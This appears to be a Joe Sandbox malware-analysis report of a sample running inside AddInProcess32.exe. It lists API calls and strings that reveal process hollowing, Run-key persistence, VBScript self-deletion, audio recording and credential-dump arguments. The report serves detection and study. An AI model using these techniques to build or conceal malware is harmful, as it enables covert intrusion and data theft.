                                                                                                  • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                                                                  • Opcode Fuzzy Hash: a332c2859ef59da40decfcbeef2faf7b264db83c1a690ef57184ee4fa2b6b732
                                                                                                  • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                  • API String ID: 4188446516-3035715614
                                                                                                  • Opcode ID: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                                                                  • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                                                                  • Opcode Fuzzy Hash: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                                                                  • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                  • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("
                                                                                                  • API String ID: 1861856835-2336284224
                                                                                                  • Opcode ID: c4393fd19bccd6c2f879462f0d82df3a4d9ae7d33e2cc77a0976e46010ec0e0e
                                                                                                  • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                                                                  • Opcode Fuzzy Hash: c4393fd19bccd6c2f879462f0d82df3a4d9ae7d33e2cc77a0976e46010ec0e0e
                                                                                                  • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                  • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF
                                                                                                  • API String ID: 3797177996-3101290586
                                                                                                  • Opcode ID: 0fcb6c33d985934dd252e72b954aca4317726d392740a9dd8ed5da055631409f
                                                                                                  • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                                                                  • Opcode Fuzzy Hash: 0fcb6c33d985934dd252e72b954aca4317726d392740a9dd8ed5da055631409f
                                                                                                  • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                  • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                                                                                  • API String ID: 2649220323-4116078715
                                                                                                  • Opcode ID: f91c537b1438423dbbe7fd67c0860d571bb6d269f80a0bb95348768309dd1152
                                                                                                  • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                  • Opcode Fuzzy Hash: f91c537b1438423dbbe7fd67c0860d571bb6d269f80a0bb95348768309dd1152
                                                                                                  • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
• API String ID: 738084811-1354618412
• Opcode ID: d07c2e591f182763e9b9265b4258d123774224afecaf1caba758f500f614ac27
• Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
• Opcode Fuzzy Hash: d07c2e591f182763e9b9265b4258d123774224afecaf1caba758f500f614ac27
• Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
• WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
• WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
• WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
• Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
• Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
• Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-4283035339
• Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
• Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
• Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
• Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$RG$RG
• API String ID: 1579085052-2529979590
• Opcode ID: 52f4f3f1bc35ba706b6d12aaaeccf9499893d0d940b3e626f3016a651ae181ef
• Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
• Opcode Fuzzy Hash: 52f4f3f1bc35ba706b6d12aaaeccf9499893d0d940b3e626f3016a651ae181ef
• Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32(?), ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32(?,?), ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
• Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
• Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
• Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-3346362794
• Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
• Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
• Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
• Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
APIs
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
• Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
• Opcode Fuzzy Hash: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
• Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
• GetCursorPos.USER32(?), ref: 0041D67A
• SetForegroundWindow.USER32(?), ref: 0041D683
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
• Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
• ExitProcess.KERNEL32 ref: 0041D6F6
• CreatePopupMenu.USER32 ref: 0041D6FC
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
• Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
• Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
• Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
APIs
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
• Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
• Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
• Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
• Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
• Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
• Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
• Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
• Sleep.KERNEL32(00000064), ref: 00412ECF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$@TG$@TG
• API String ID: 1223786279-723413999
APIs
• ___free_lconv_mon.LIBCMT ref: 0045138A
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
• _free.LIBCMT ref: 0045137F
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 004513A1
• _free.LIBCMT ref: 004513B6
• _free.LIBCMT ref: 004513C1
• _free.LIBCMT ref: 004513E3
• _free.LIBCMT ref: 004513F6
• _free.LIBCMT ref: 00451404
• _free.LIBCMT ref: 0045140F
• _free.LIBCMT ref: 00451447
• _free.LIBCMT ref: 0045144E
• _free.LIBCMT ref: 0045146B
• _free.LIBCMT ref: 00451483
Memory Dump Source
